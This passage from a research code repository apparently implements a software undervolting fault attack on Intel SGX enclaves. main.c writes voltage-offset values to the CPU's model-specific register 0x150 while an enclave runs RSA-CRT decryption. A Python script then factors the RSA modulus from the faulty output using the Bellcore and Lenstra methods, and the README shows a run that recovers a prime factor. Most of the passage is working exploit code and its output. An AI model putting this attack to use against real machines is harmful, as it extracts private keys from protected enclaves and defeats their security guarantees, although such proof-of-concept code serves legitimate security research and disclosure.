55 | # diff = (mp - mq)         
56 | # h = (invQ * diff)
57 | # m = (mq + h * q) % n
58 | 
59 | # working real-world examples for faulty decryptions (or signatures)
60 | pt_fault = [0x9f, 0x7b, 0x9c, 0xb8, 0x74, 0xce, 0xf7, 0x52, 0x3e, 0x91, 0x1a, 0xed, 0x33, 0x55, 0xc8, 0x65, 0xbe, 0xd5, 0xdb, 0x6a, 0x3c, 0x74, 0x94, 0xb5, 0xad, 0x80, 0xaa, 0x60, 0x77, 0x5a, 0xa6, 0x42, 0x2d, 0xc2, 0xc4, 0x40, 0xc2, 0xa0, 0xc2, 0x1d, 0x94, 0x19, 0x19, 0x55, 0xd4, 0xad, 0xa6, 0x49, 0x24, 0x37, 0xf1, 0xca, 0x17, 0xef, 0xa6, 0xe8, 0x66, 0x56, 0xbf, 0x04, 0x74, 0xa5, 0x2e, 0xec, 0xb6, 0x7b, 0xac, 0x50, 0xf5, 0x4c, 0x54, 0x29, 0x90, 0x7b, 0xee, 0x3b, 0x98, 0xe9, 0xde, 0x6b, 0xc1, 0x41, 0x57, 0xcd, 0xc9, 0x1b, 0x70, 0x4c, 0xd9, 0xd1, 0xe0, 0xac, 0x9b, 0xf9, 0x41, 0xb3, 0x61, 0x32, 0x59, 0xc7, 0xad, 0xd4, 0x36, 0x29, 0xd2, 0xba, 0xc7, 0xfe, 0xfc, 0x81, 0xaf, 0x71, 0x69, 0x12, 0x2e, 0xc6, 0x72, 0x1f, 0x55, 0x6d, 0x0a, 0x9f, 0xd5, 0x36, 0x11, 0x90, 0x7f, 0xa8]
61 | #pt_fault = [0x90, 0x45, 0xd9, 0x36, 0x42, 0xde, 0xbb, 0x27, 0x48, 0xf0, 0x03, 0xf2, 0xc7, 0x80, 0xd3, 0x82, 0xbf, 0x6c, 0x72, 0x11, 0x1a, 0x60, 0xab, 0x2b, 0xc8, 0x19, 0xea, 0xa0, 0x9a, 0x1b, 0xcf, 0xde, 0x8e, 0x39, 0x23, 0x14, 0x32, 0xcc, 0x60, 0x60, 0x6b, 0x8c, 0xe8, 0xca, 0x4d, 0xfe, 0x3a, 0xae, 0xfb, 0x3d, 0x2f, 0x4f, 0xc9, 0xcb, 0xc3, 0x85, 0xbf, 0x73, 0x3d, 0x2c, 0xa4, 0x6c, 0x9f, 0x7e, 0x35, 0x8d, 0xe9, 0xeb, 0x51, 0x7f, 0xc5, 0x36, 0x5b, 0x63, 0xf9, 0xb3, 0xad, 0xc7, 0x50, 0x8f, 0x37, 0xef, 0x30, 0xdb, 0x80, 0xbb, 0xd5, 0xf7, 0x1d, 0x9d, 0xed, 0xe3, 0x6a, 0xbf, 0xc8, 0x89, 0xa2, 0x77, 0xa8, 0x0e, 0x70, 0x51, 0x5f, 0x91, 0xcc, 0x48, 0x57, 0x11, 0x3c, 0x18, 0x30, 0x4a, 0xbb, 0xd6, 0x58, 0xcc, 0xd0, 0x83, 0x2e, 0x44, 0x67, 0x63, 0x60, 0xee, 0xfa, 0x28, 0x0d, 0x3c]
62 | #pt_fault = [0x5f, 0x01, 0xd3, 0xaa, 0xb5, 0xb7, 0xa8, 0xe5, 0xdd, 0xbc, 0xa5, 0xa2, 0xb3, 0xc0, 0xec, 0x00, 0xaa, 0x21, 0x55, 0xcd, 0x6f, 0xe0, 0x31, 0xdf, 0xa1, 0x15, 0xbc, 0xa6, 0x97, 0x71, 0x80, 0x08, 0xa1, 0x22, 0xc9, 0x47, 0x00, 0xe7, 0x8c, 0x3a, 0x37, 0x2b, 0x8c, 0x4d, 0x9f, 0xea, 0x72, 0x5a, 0x24, 0x9c, 0x3c, 0xa8, 0x67, 0x72, 0x64, 0xe3, 0x5d, 0x6e, 0x02, 0xe4, 0x13, 0x35, 0x3c, 0x8a, 0xf4, 0x4e, 0xed, 0xe2, 0x0b, 0x37, 0x16, 0xf5, 0x99, 0x9e, 0x9c, 0xea, 0x2d, 0xa3, 0x62, 0xe0, 0x5a, 0x68, 0x5b, 0xfd, 0xa6, 0xfd, 0x5d, 0x95, 0xa5, 0x6a, 0x01, 0xe2, 0x52, 0x26, 0x77, 0x92, 0x12, 0xc9, 0xec, 0xfa, 0xef, 0x1c, 0x7b, 0xf3, 0x28, 0x34, 0x02, 0x3e, 0x10, 0x89, 0x28, 0x04, 0x0f, 0xb7, 0x70, 0x96, 0x72, 0x43, 0x54, 0xa1, 0xe5, 0xd9, 0xbd, 0xb6, 0xaf, 0x5e, 0x10, 0xaa]
63 | 
64 | pt_fault = list_to_int(pt_fault)
65 | 
66 | print("Correct: " + hex(pt))
67 | print("Faulty:  " + hex(pt_fault))
68 | 
69 | # Bellcore
70 | print("Factoring with Bellcore: ")
71 | print hex(compute_GCD((pt - pt_fault) % n, n))
72 | 
73 | # Lenstra
74 | print("Factoring with Lenstra:  ")
75 | print hex(compute_GCD((pow(pt_fault, e, n) - ct) % n, n))


--------------------------------------------------------------------------------
/sgx_crt_rsa/Makefile:
--------------------------------------------------------------------------------
 1 | LIBSGXSTEP_DIR       = ../sgx-step/
 2 | LIBSGXSTEP           = $(LIBSGXSTEP_DIR)/libsgxstep
 3 | URTS_LIB_PATH        = $(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
 4 | 
 5 | ifeq ($(SGX_SDK),)
 6 |     SGX_SDK          = /opt/intel/sgxsdk
 7 | endif
 8 | export SGX_SDK
 9 | ifneq ($(SGX_SDK), /opt/intel/sgxsdk)
10 |     URTS_LD_LIBRARY_PATH = LD_LIBRARY_PATH=$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
11 | endif
12 | 
13 | ENCLAVE              = Enclave
14 | SUBDIRS              = $(ENCLAVE) $(LIBSGXSTEP)
15 | 
16 | CC                   = gcc
17 | AS                   = gcc
18 | LD                   = gcc
19 | 
20 | ifeq ($(M32), 1)
21 | 	CFLAGS   = -m32 -DM32=$(M32)
22 | 	LDFLAGS  = -m32
23 | else
24 | 	LIB_SUFX = 64
25 | endif
26 | 
27 | CFLAGS              += -fPIC -fno-stack-protector -fno-builtin -fno-jump-tables \
28 |                        -fno-common -Wno-attributes -g -D_GNU_SOURCE -O0
29 | INCLUDE             += -I$(SGX_SDK)/include/ -I$(LIBSGXSTEP_DIR) 
30 | LDFLAGS             += -lsgx-step -lencl_proxy -lsgx_urts \
31 |                        -lsgx_uae_service -pthread $(SUBDIRS:%=-L %) -L$(SGX_SDK)/lib$(LIB_SUFX)/ \
32 |                        -L$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
33 | 
34 | SOURCES              = $(shell ls *.c)
35 | OBJECTS              = $(SOURCES:.c=.o)
36 | OUTPUT               = app
37 | 
38 | BUILDDIRS            = $(SUBDIRS:%=build-%)
39 | CLEANDIRS            = $(SUBDIRS:%=clean-%)
40 | 
41 | .SILENT:
42 | all: $(OUTPUT)
43 | 	
44 | run: clean all
45 | 	sudo $(URTS_LD_LIBRARY_PATH) ./$(OUTPUT) ${ARGS}
46 | 
47 | debug: clean all
48 | 	sudo `which sgx-gdb` ./$(OUTPUT)
49 | 
50 | $(OUTPUT): $(BUILDDIRS) $(OBJECTS)
51 | 	echo "$(INDENT)[LD]" $(OBJECTS) $(LIBS) -o $(OUTPUT) 
52 | 	$(LD) $(OBJECTS) $(LDFLAGS) -o $(OUTPUT) 
53 | 
54 | %.o : %.c
55 | 	echo "$(INDENT)[CC] " $<
56 | 	$(CC) $(CFLAGS) $(INCLUDE) -c $<
57 | 
58 | %.o : %.S
59 | 	echo "$(INDENT)[AS] " $<
60 | 	$(AS) $(INCLUDE) -c $< -o $@
61 | 
62 | clean: $(CLEANDIRS)
63 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT)
64 | 	rm -f $(OBJECTS) $(OUTPUT)
65 | 
66 | $(BUILDDIRS):
67 | 	echo "$(INDENT)[===] $(@:build-%=%) [===]"
68 | 	$(MAKE) -C $(@:build-%=%) INDENT+="$(INDENT_STEP)" M32=$(M32) curr-dir=$(curr-dir)/$(@:build-%=%)
69 | 
70 | $(CLEANDIRS):
71 | 	echo "$(INDENT)[===] $(@:clean-%=%) [===]"
72 | 	$(MAKE) clean -C $(@:clean-%=%) INDENT+="$(INDENT_STEP)" curr-dir=$(curr-dir)/$(@:build-%=%)
73 | 


--------------------------------------------------------------------------------
/sgx_crt_rsa/README.md:
--------------------------------------------------------------------------------
 1 | # Example IV.B: Full Key Extraction from  RSA-CRT  Decryption/Signature in SGX using IPP Crypto
 2 | 
 3 | As usual, you need SGX-Step. As usual, we assume it is in `../sgx-step/` - adapt the Makefile (`LIBSGXSTEP_DIR`) if needed. We also assume the SGX-SDK is correctly setup and the environment sourced.
 4 | 
 5 | Run on our i3-7100U-A with -225mV:
 6 | 
 7 | ```
 8 | david@bagger$ ARGS="500 -225" make run
 9 | [...]
10 | [LD] main.o -o app
11 | [main.c] Creating enclave...
12 | [pt.c] /dev/sgx-step opened!
13 | [main.c] init RSA...
14 | Enclave: Init P...
15 | Enclave: DW: eecfae81
16 | [...]
17 | Enclave: create_BN_state() = 0x7fc61325d060
18 | Enclave: Init Q...Enclave: DW: c97fb1f0
19 | Enclave: DW: 27f453f6
20 | [...]
21 | Enclave: create_BN_state() = 0x7fc61325d128
22 | Enclave: DW: 54494ca6
23 | [...]
24 | Enclave: create_BN_state() = 0x7fc61325d1f0
25 | Enclave: DW: 471e0290
26 | [...]
27 | Enclave: create_BN_state() = 0x7fc61325d2b8
28 | Enclave: DW: b06c4fda
29 | [...]
30 | Enclave: create_BN_state() = 0x7fc61325d380
31 | Enclave: DW: bbf82f09
32 | [...]
33 | Enclave: create_BN_state() = 0x7fc61325d4d8
34 | Enclave: DW: a5dafc53
35 | [...]
36 | Enclave: create_BN_state() = 0x7fc61325d620
37 | Enclave: DW: 00000011
38 | Enclave: create_BN_state() = 0x7fc61325d448
39 | Enclave: DW: 00eb7a19
40 | [...]
41 | Enclave: create_BN_state() = 0x7fc61325d7f8
42 | Enclave: DW: 1253e04d
43 | [...]
44 | Enclave: create_BN_state() = 0x7fc61325d940
45 | [main.c] Now ECCing inside SGX...
46 | [main.c] Thread exiting
47 | [main.c] Done.
48 | Result = 1
49 | 0x9f, 0x7b, 0x9c, 0xb8, 0x74, 0xce, 0xf7, 0x52, 0x3e, 0x91, 0x1a, 
50 | 0xed, 0x33, 0x55, 0xc8, 0x65, 0xbe, 0xd5, 0xdb, 0x6a, 0x3c, 0x74, 
51 | 0x94, 0xb5, 0xad, 0x80, 0xaa, 0x60, 0x77, 0x5a, 0xa6, 0x42, 0x2d, 
52 | 0xc2, 0xc4, 0x40, 0xc2, 0xa0, 0xc2, 0x1d, 0x94, 0x19, 0x19, 0x55, 
53 | 0xd4, 0xad, 0xa6, 0x49, 0x24, 0x37, 0xf1, 0xca, 0x17, 0xef, 0xa6, 
54 | 0xe8, 0x66, 0x56, 0xbf, 0x04, 0x74, 0xa5, 0x2e, 0xec, 0xb6, 0x7b, 
55 | 0xac, 0x50, 0xf5, 0x4c, 0x54, 0x29, 0x90, 0x7b, 0xee, 0x3b, 0x98, 
56 | 0xe9, 0xde, 0x6b, 0xc1, 0x41, 0x57, 0xcd, 0xc9, 0x1b, 0x70, 0x4c, 
57 | 0xd9, 0xd1, 0xe0, 0xac, 0x9b, 0xf9, 0x41, 0xb3, 0x61, 0x32, 0x59, 
58 | 0xc7, 0xad, 0xd4, 0x36, 0x29, 0xd2, 0xba, 0xc7, 0xfe, 0xfc, 0x81, 
59 | 0xaf, 0x71, 0x69, 0x12, 0x2e, 0xc6, 0x72, 0x1f, 0x55, 0x6d, 0x0a, 
60 | 0x9f, 0xd5, 0x36, 0x11, 0x90, 0x7f, 0xa8, 0x00, 0x00, 0x00, 0x00, 
61 | [...]
62 | Noooo!!!!1111elfoelf
63 | [main.c] Exiting...
64 | ```
65 | 
66 | Copying the resulting faulty ciphertext to `Evaluation/eval.py`:
67 | 
68 | ```
69 | Correct: 0xeb7a19ace9e3006350e329504b45e2ca82310b26dcd87d5c68f1eea8f55267
70 | c31b2e8bb4251f84d7e0b2c04626f5aff93edcfb25c9c2b3ff8ae10e839a2ddb4cdcfe4ff
71 | 47728b4a1b7c1362baad29ab48d2869d5024121435811591be392f982fb3e87d095aeb404
72 | 48db972f3ac14f7bc275195281ce32d2f1b76d4d353e2dL
73 | 
74 | Faulty:  0xa87f901136d59f0a6d551f72c62e126971af81fcfec7bad22936d4adc75932
75 | 61b341f99bace0d1d94c701bc9cd5741c16bdee9983bee7b9029544cf550ac7bb6ec2ea57
76 | 404bf5666e8a6ef17caf1372449a6add4551919941dc2a0c240c4c22d42a65a7760aa80ad
77 | b594743c6adbd5be65c85533ed1a913e52f7ce74b89c7b9fL
78 | 
79 | Factoring with Bellcore: 
80 | 0xeecfae81b1b9b3c908810b10a1b5600199eb9f44aef4fda493b81a9e3d84f632124ef02
81 | 36e5d1e3b7e28fae7aa040a2d5b252176459d1f397541ba2a58fb6599L
82 | 
83 | Factoring with Lenstra:  
84 | 0xeecfae81b1b9b3c908810b10a1b5600199eb9f44aef4fda493b81a9e3d84f632124ef02
85 | 36e5d1e3b7e28fae7aa040a2d5b252176459d1f397541ba2a58fb6599L
86 | ```
87 | 


--------------------------------------------------------------------------------
/sgx_crt_rsa/main.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  This file is part of the SGX-Step enclave execution control framework.
  3 |  *
  4 |  *  Copyright (C) 2017 Jo Van Bulck <jo.vanbulck@cs.kuleuven.be>,
  5 |  *                     Raoul Strackx <raoul.strackx@cs.kuleuven.be>
  6 |  *
  7 |  *  SGX-Step is free software: you can redistribute it and/or modify
  8 |  *  it under the terms of the GNU General Public License as published by
  9 |  *  the Free Software Foundation, either version 3 of the License, or
 10 |  *  (at your option) any later version.
 11 |  *
 12 |  *  SGX-Step is distributed in the hope that it will be useful,
 13 |  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 |  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 15 |  *  GNU General Public License for more details.
 16 |  *
 17 |  *  You should have received a copy of the GNU General Public License
 18 |  *  along with SGX-Step. If not, see <http://www.gnu.org/licenses/>.
 19 |  */
 20 | 
 21 | #include <sgx_urts.h>
 22 | #include "Enclave/encl_u.h"
 23 | #include <sys/mman.h>
 24 | #include <signal.h>
 25 | #include "libsgxstep/enclave.h"
 26 | #include "libsgxstep/debug.h"
 27 | #include "libsgxstep/pt.h"
 28 | 
 29 | #include <stdint.h>
 30 | #include <stdio.h>
 31 | #include <fcntl.h>
 32 | #include <unistd.h>
 33 | #include <stdlib.h>
 34 | #include <inttypes.h>
 35 | #include <time.h>
 36 | #include <pthread.h>
 37 | 
 38 | #define DEBUG_OUTPUT
 39 | 
 40 | /* OCall functions */
 41 | void ocall_print_string(const char *str)
 42 | {
 43 |     /* Proxy/Bridge will check the length and null-terminate 
 44 |      * the input string to prevent buffer overflow. 
 45 |      */
 46 |     printf("Enclave: %s", str);
 47 | }
 48 | 
 49 | int64_t my_round(float num)
 50 | {
 51 |     return num < 0 ? num - 0.5 : num + 0.5;
 52 | }
 53 | 
 54 | uint64_t wrmsr_value(char* in,uint64_t plane)
 55 | {
 56 |       int64_t val=strtol(in,NULL,10);
 57 |       val=my_round(val*1.024);
 58 |       val=0xFFE00000&((val&0xFFF)<<21);
 59 |       val=val|0x8000001100000000;
 60 |       val=val|(plane<<40);
 61 |       return (uint64_t)val;
 62 | }
 63 | 
 64 | 
 65 | volatile int fault_fired = 0;
 66 | uint64_t enclave_base = 0;
 67 | 
 68 | // Handle the page fault in thread dummy_page
 69 | void fault_handler(int signal)
 70 | {
 71 | 	// Restore memory permissions, this will continue the thread when the fault handler returns
 72 |     if(fault_fired == 0)
 73 |     {
 74 |     }
 75 | 
 76 | 	fault_fired++;
 77 | }
 78 | 
 79 | #define RSA_LEN 256
 80 | 
 81 | const uint8_t result_exp[RSA_LEN] = {0x2d, 0x3e, 0x35, 0x4d, 0x6d, 0xb7, 0xf1, 0xd2, 0x32, 0xce, 0x81, 0x52, 0x19, 0x75, 0xc2, 0x7b, 0x4f, 0xc1, 0x3a, 0x2f, 0x97, 0xdb, 0x48, 0x04, 0xb4, 0xae, 0x95, 0xd0, 0x87, 0x3e, 0xfb, 0x82, 0xf9, 0x92, 0xe3, 0x1b, 0x59, 0x11, 0x58, 0x43, 0x21, 0x41, 0x02, 0xd5, 0x69, 0x28, 0x8d, 0xb4, 0x9a, 0xd2, 0xaa, 0x2b, 0x36, 0xc1, 0xb7, 0xa1, 0xb4, 0x28, 0x77, 0xf4, 0x4f, 0xfe, 0xdc, 0x4c, 0xdb, 0x2d, 0x9a, 0x83, 0x0e, 0xe1, 0x8a, 0xff, 0xb3, 0xc2, 0xc9, 0x25, 0xfb, 0xdc, 0x3e, 0xf9, 0xaf, 0xf5, 0x26, 0x46, 0xc0, 0xb2, 0xe0, 0xd7, 0x84, 0x1f, 0x25, 0xb4, 0x8b, 0x2e, 0x1b, 0xc3, 0x67, 0x52, 0xf5, 0xa8, 0xee, 0xf1, 0x68, 0x5c, 0x7d, 0xd8, 0xdc, 0x26, 0x0b, 0x31, 0x82, 0xca, 0xe2, 0x45, 0x4b, 0x50, 0x29, 0xe3, 0x50, 0x63, 0x00, 0xe3, 0xe9, 0xac, 0x19, 0x7a, 0xeb, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 82 | 
 83 | volatile int flag1 = 0, flag2 = 0;
 84 | int fd0 = 0;
 85 | 
 86 | uint64_t val_plane0 = 0;
 87 | uint64_t val_plane2 = 0;
 88 | uint64_t val_zero_plane0 = 0;
 89 | uint64_t val_zero_plane2 = 0;
 90 | uint64_t tick = 0;
 91 | 
 92 | #define TICK_MAX (5347771/3)
 93 | 
 94 | void *faulting_thread(void *input)
 95 | {
 96 |     tick = 0;
 97 | 
 98 |     flag2++;
 99 |     asm volatile("" ::: "memory"); 
100 | 
101 |     while(flag1 == 0);
102 |     asm volatile("" ::: "memory"); 
103 | 
104 |     while(flag1 == 1 && tick < TICK_MAX)
105 |     {
106 |         tick++;
107 |     }
108 |     asm volatile("" ::: "memory"); 
109 | 
110 |     // voltage back up
111 |     pwrite(fd0,&val_zero_plane0,sizeof val_zero_plane0,0x150);
112 |     pwrite(fd0,&val_zero_plane2,sizeof val_zero_plane2,0x150);
113 | 
114 |     info("Thread exiting");
115 | 
116 |     return 0;
117 | }
118 | 
119 | int main( int argc, char **argv )
120 | {
121 | 	sgx_launch_token_t token = {0};
122 | 	int retval = 0, i = 0, updated = 0;
123 |     sgx_enclave_id_t eid = 0;
124 |     uint8_t buffer[RSA_LEN] = { 0 };
125 |     fault_fired = 0;
126 |     pthread_t t1;
127 | 
128 |    	info("Creating enclave...");
129 | 	SGX_ASSERT( sgx_create_enclave( "./Enclave/encl.so", /*debug=*/ 1,
130 |                                     &token, &updated, &eid, NULL ) );
131 | 
132 |     // Install PF handler
133 | 	// ASSERT(signal(SIGSEGV, fault_handler) != SIG_ERR);
134 | 
135 |     // Update enclave base buffer
136 |     enclave_base = get_enclave_base();
137 | 
138 |     int j = 0;
139 |     const char* program = argv[0];
140 | 
141 |     if (argc != 3)
142 |     {
143 |         printf("Need 2 args: %s iterations offset\n",program);
144 |         exit (-1);
145 |     }
146 | 
147 |     // Target ecall
148 |     info("init RSA...");
149 | 
150 |     uint8_t res_var = 0;
151 |     SGX_ASSERT( rsa_init_ecall(eid, &res_var) );
152 | 
153 |     if(res_var != 1)
154 |     {
155 |         printf("Could not init RSA!\n");
156 |         goto done;
157 |     }
158 | 
159 |     val_plane0 = wrmsr_value(argv[2],0);
160 |     val_plane2 = wrmsr_value(argv[2],2);
161 | 
162 |     uint32_t iterations = atoi(argv[1]);
163 |     uint32_t iterations_50k = 50000-iterations;
164 | 
165 |     val_zero_plane0 = wrmsr_value("0",0);
166 |     val_zero_plane2 = wrmsr_value("0",2);
167 | 
168 |     fd0 = open("/dev/cpu/0/msr", O_WRONLY);
169 | 
170 |     if(fd0 == -1)
171 |     {
172 |         printf("Could not open /dev/cpu/0/msr\n");
173 |         return -1;
174 |     }
175 | 
176 |     // Create thread A
177 | 	pthread_create(&t1, NULL, faulting_thread, 0);
178 | 
179 |     // Wait for thread A to be ready
180 |     while(flag2 == 0) {}
181 | 
182 |     info("Now computing inside SGX...");
183 | 
184 |     pwrite(fd0,&val_plane0,sizeof val_plane0,0x150);
185 |     pwrite(fd0,&val_plane2,sizeof val_plane2,0x150);
186 | 
187 |     // Target ecall
188 |     flag1++;
189 |     asm volatile("" ::: "memory"); 
190 |     SGX_ASSERT( rsa_dec_ecall(eid, &res_var, buffer, iterations) );
191 |     asm volatile("" ::: "memory"); 
192 |     flag1++;
193 | 
194 |     
195 | 
196 |     pthread_join(t1, NULL);
197 | 
198 |     close(fd0);
199 | 
200 |     info("Done, thread reports %d ticks", tick);
201 | 
202 | 	printf("Result = %x\n", res_var);
203 | 
204 |     for(i = 0; i < RSA_LEN; i++)
205 |     {
206 |         printf("0x%02x, ", buffer[i]);
207 |     }
208 |     printf("\n");
209 | 
210 |     if(memcmp(buffer, result_exp, RSA_LEN) != 0)
211 |     {
212 |         printf("Noooo!!!!1111elfoelf\n");
213 |     }
214 |     else
215 |     {
216 |         printf("meh - all fine\n");
217 |     }
218 | 
219 |     SGX_ASSERT( rsa_clean_ecall(eid, &res_var) );
220 | 
221 | done:
222 |     SGX_ASSERT( sgx_destroy_enclave(eid) );
223 |     info("Exiting...");
224 | 	return 0;
225 | }
226 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/Enclave/Makefile:
--------------------------------------------------------------------------------
  1 | C		  = gcc
  2 | AR		  = ar
  3 | LD		  = gcc
  4 | EDGER		  = sgx_edger8r
  5 | SIGNER		  = sgx_sign
  6 | INCLUDE       += -I$(SGX_SDK)/include/ -I$(SGX_SDK)/include/tlibc  -I$(SGX_SDK)/include/ipp -Iinternal/
  7 | 
  8 | T_CFLAGS	  = $(CFLAGS) -maes -fvisibility=hidden -fpie -fstack-protector -g -Os
  9 | U_CFLAGS	  = $(CFLAGS) -fvisibility=hidden -fpie -fstack-protector -g
 10 | AR_FLAGS	  = rcs
 11 | OBJECTS		  = encl.o 
 12 | LIB_SGX_TRTS      = -lsgx_trts
 13 | LIB_SGX_TSERVICE  = -lsgx_tservice
 14 | 
 15 | ifeq ($(M32), 1)
 16 | 	T_CFLAGS += -m32 -msse2 -DM32=1
 17 | 	U_CFLAGS += -m32 -msse2
 18 | 	LD_FLAGS  = -m32
 19 | else
 20 | 	LIB_SUFX  = 64
 21 | endif
 22 | 
 23 | ENCLAVE_LIBS      = $(LIB_SGX_TRTS)
 24 | ENCLAVE_LIB_PARTS = -lsgx_tstdc -lsgx_tcrypto $(LIB_SGX_TSERVICE)
 25 | ENCLAVE	          = encl
 26 | PRIVATE_KEY       = private_key.pem
 27 | PUBLIC_KEY        = public_key.pem
 28 | KEY_SIZE          = 3072
 29 | ENCLAVE_EDL       = $(ENCLAVE).edl
 30 | ENCLAVE_CONFIG    = $(ENCLAVE).config.xml
 31 | OUTPUT_T          = $(ENCLAVE).so
 32 | OUTPUT_T_UNSIG    = $(ENCLAVE).unsigned.so
 33 | OUTPUT_U          = lib$(ENCLAVE)_proxy.a
 34 | LIB_DIRS          = -L $(SGX_SDK)/lib$(LIB_SUFX)/
 35 | LD_FLAGS         += -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles \
 36 |                     -Wl,--whole-archive -Wl,--start-group $(ENCLAVE_LIBS) -Wl,--end-group \
 37 |                     -Wl,--no-whole-archive -Wl,--start-group $(ENCLAVE_LIB_PARTS) -Wl,--end-group \
 38 |                     -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \
 39 |                     -Wl,-pie,-eenclave_entry -Wl,--export-dynamic  \
 40 |                     -Wl,--defsym,__ImageBase=0 
 41 | TRUSTED_OBJECTS   = $(ENCLAVE)_t.o
 42 | UNTRUSTED_OBJECTS = $(ENCLAVE)_u.o 
 43 | TRUSTED_CODE      = $(ENCLAVE)_t.h $(ENCLAVE)_t.c
 44 | UNTRUSTED_CODE    = $(ENCLAVE)_u.h $(ENCLAVE)_u.c
 45 | 
 46 | #.SILENT:
 47 | all: $(OUTPUT_T) $(OUTPUT_U)
 48 | 
 49 | $(OUTPUT_T) : $(TRUSTED_OBJECTS) $(OBJECTS) $(PRIVATE_KEY)
 50 | 	echo "$(INDENT)[LD]  " $(OBJECTS) $(TRUSTED_OBJECTS) $(ENCLAVE_LIBS) $(ENCLAVE_LIBS_PARTS) $(OUTPUT_T_UNSIG)
 51 | 	$(LD) $(OBJECTS) $(TRUSTED_OBJECTS) $(LD_FLAGS) $(LIB_DIRS) -o $(OUTPUT_T_UNSIG) 
 52 | 	
 53 | 	echo "$(INDENT)[SGN]" $(OUTPUT_T_UNSIG)
 54 | 	$(SIGNER) sign -key $(PRIVATE_KEY) -enclave $(OUTPUT_T_UNSIG) -out $(OUTPUT_T) -config $(ENCLAVE_CONFIG) > /dev/null 2> /dev/null
 55 | 
 56 | $(OUTPUT_U) : $(UNTRUSTED_OBJECTS) 
 57 | 	echo "$(INDENT)[AR]  " $(OUTPUT_U)
 58 | 	$(AR) $(AR_FLAGS) $(OUTPUT_U) $(UNTRUSTED_OBJECTS) 
 59 | 	
 60 | %_t.o : $(subst .o,.c,$@) edger
 61 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(trusted edge)"
 62 | 	touch $(subst .o,.c,$@)
 63 | 	$(CC) -c $(INCLUDE) $(T_CFLAGS) $(subst .o,.c,$@)
 64 | 
 65 | %_u.o : $(subst .o,.c,$@) edger
 66 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(untrusted edge)"
 67 | 	touch $(subst .o,.c,$@)
 68 | 	$(CC) -c $(INCLUDE) $(U_CFLAGS) $(subst .o,.c,$@)
 69 | 
 70 | %.o : %.c edger
 71 | 	echo "$(INDENT)[CC] " $< "(core)"
 72 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 73 | 
 74 | %.o : %.cpp
 75 | 	echo "$(INDENT)[CC] " $< "(core)"
 76 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 77 | 
 78 | 
 79 | %.o : %.S
 80 | 	echo "$(INDENT)[AS] " $< "(core)"
 81 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $< -o $@
 82 | 
 83 | asm.s: build_asm.py
 84 | 	./build_asm.py
 85 | 
 86 | edger: $(ENCLAVE).edl
 87 | 	echo "$(INDENT)[GEN]" $(EDGER) $(ENCLAVE_EDL)
 88 | 	$(EDGER) $(ENCLAVE_EDL)
 89 | 
 90 | .PHONY: force_check
 91 | force_check:
 92 | 	true
 93 | 
 94 | .PHONY: scrub
 95 | scrub: 
 96 | 	echo "$(INDENT)[RM]  " $(PRIVATE_KEY) $(PUBLIC_KEY)
 97 | 	$(RM) $(PRIVATE_KEY) $(PUBLIC_KEY)
 98 | 
 99 | $(PRIVATE_KEY): 
100 | 	echo "$(INDENT)[GEN] $(PRIVATE_KEY) ($(KEY_SIZE) bits)"
101 | 
102 | 	# generate 3072 bit private RSA key
103 | 	openssl genrsa -out $(PRIVATE_KEY) -3 $(KEY_SIZE)
104 | 	
105 | 	echo "$(INDENT)[EXT] $(PUBLIC_KEY)"
106 | 	# extract public key
107 | 	openssl rsa -in $(PRIVATE_KEY) -pubout -out $(PUBLIC_KEY) 
108 | 	
109 | 	# sign enclave
110 | 	#sgx_sign sign -key private_key.pem -enclave Enclave/encl.so -out encl.signed.so
111 | 	
112 | .PHONY: clean
113 | clean:
114 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
115 | 	$(RM) $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
116 | 	echo "$(INDENT)[RM]" $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
117 | 	$(RM) $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
118 | 


--------------------------------------------------------------------------------
/sgx_launch_enclave_bypass/Enclave/encl.config.xml:
--------------------------------------------------------------------------------
 1 | <!-- Please refer to User's Guide for the explanation of each field -->
 2 | <EnclaveConfiguration>
 3 |   <ProdID>0</ProdID>
 4 |   <ISVSVN>0</ISVSVN>
